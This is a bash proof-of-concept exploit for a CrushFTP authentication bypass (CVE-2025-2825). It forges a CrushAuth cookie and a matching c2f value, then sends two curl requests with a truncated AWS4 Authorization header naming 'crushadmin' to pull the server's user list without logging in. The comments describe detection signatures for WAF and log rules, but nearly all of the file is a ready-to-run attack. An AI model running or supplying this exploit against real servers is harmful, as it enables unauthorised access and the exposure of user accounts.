#!/bin/bash

# CrushFTP CVE-2025-2825 Auth Bypass Exploit (Improved Version)
# Author: jeongwoongyoon
# This PoC performs a double-request strategy (like nuclei) to increase reliability.
# Usage: ./exploit_crushftp.sh http://<target>:<port> [CrushAuth] [c2f]

# Positional arguments: the base URL and, optionally, a caller-supplied
# CrushAuth cookie value and c2f value. Both are generated below when absent.
TARGET=$1
CUSTOM_CRUSHAUTH=$2
CUSTOM_C2F=$3

# Only the target URL is mandatory; the usage line mirrors the header comment.
if [ -z "$TARGET" ]; then
  echo "Usage: $0 http://<target>:<port> [CrushAuth] [c2f]"
  exit 1
fi

# Generate or use provided CrushAuth/C2F
# When no CrushAuth is supplied, the cookie is assembled as
# <13 digits>_<26 alphanumerics><4 digits> and c2f is set to that same
# trailing 4-digit suffix. For detection purposes: in this request pattern the
# c2f / currentAuth value equals the last four characters of the CrushAuth
# cookie, while the rest of the cookie is random and never came from a login.
# NOTE(review): `head /dev/urandom | tr -dc ... | head -c 26` is not
# guaranteed to yield exactly 26 characters, so the total length may vary.
# NOTE(review): if only a CrushAuth value is supplied ($3 omitted), C2F is
# left empty in the else branch.
if [ -z "$CUSTOM_CRUSHAUTH" ]; then
  PREFIX=$(shuf -i 1000000000000-9999999999999 -n 1)
  MID=$(head /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 26)
  SUFFIX=$(shuf -i 1000-9999 -n 1)
  CRUSHAUTH="${PREFIX}_${MID}${SUFFIX}"
  C2F=$SUFFIX
else
  CRUSHAUTH=$CUSTOM_CRUSHAUTH
  C2F=$CUSTOM_C2F
fi

# The getUserList command against the MainUsers server group, with c2f passed
# as a query parameter. The script never performs a login, so requests to
# /WebInterface/function/ carrying command=getUserList from a client that has
# no completed login session are the server-log signal for this pattern.
URL="$TARGET/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=$C2F"

# Operator output only; the length line shows the cookie length actually sent.
echo "[+] Target: $TARGET"
echo "[+] CrushAuth: $CRUSHAUTH"
echo "[+] Length: ${#CRUSHAUTH}"
echo "[+] c2f: $C2F"
echo "[*] Sending double exploit request..."

# Send first warmup request (some servers need this)
# Both requests use the same header set. The Authorization header is an
# AWS4-HMAC-SHA256 value that stops after "Credential=crushadmin/" -- it
# carries no SignedHeaders or Signature component -- and it is paired with a
# CrushAuth cookie whose last four characters equal currentAuth / c2f. A WAF
# or log rule can match on that header shape alone, independent of the random
# cookie value. The body of this first response is discarded.
curl -s --compressed "$URL" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \
  -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \
  -H "Origin: $TARGET" \
  -H "Referer: $TARGET/WebInterface/login.html" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Accept-Encoding: identity" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
  -H "Connection: close" > /dev/null

# Short pause between the two requests (see the header comment on the
# double-request strategy).
sleep 0.3

# Second actual trigger request
# Identical to the first request; this time the response body is captured.
RESPONSE=$(curl -s --compressed "$URL" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" \
  -H "Cookie: CrushAuth=${CRUSHAUTH}; currentAuth=${C2F}" \
  -H "Origin: $TARGET" \
  -H "Referer: $TARGET/WebInterface/login.html" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Accept-Encoding: identity" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
  -H "Connection: close")

# Success is judged solely by the presence of <user_list_subitem> elements in
# the response, i.e. the server answered the getUserList command with entries
# despite no login having taken place. Only the matching lines are printed;
# on any other response the first 20 lines of the body are shown for triage.
if echo "$RESPONSE" | grep -q "<user_list_subitem>"; then
  echo "[+] Exploit successful!"
  echo "$RESPONSE" | grep "<user_list_subitem>"
else
  echo "[-] Exploit failed or blocked."
  echo "[*] Partial Response:"
  echo "$RESPONSE" | head -n 20
fi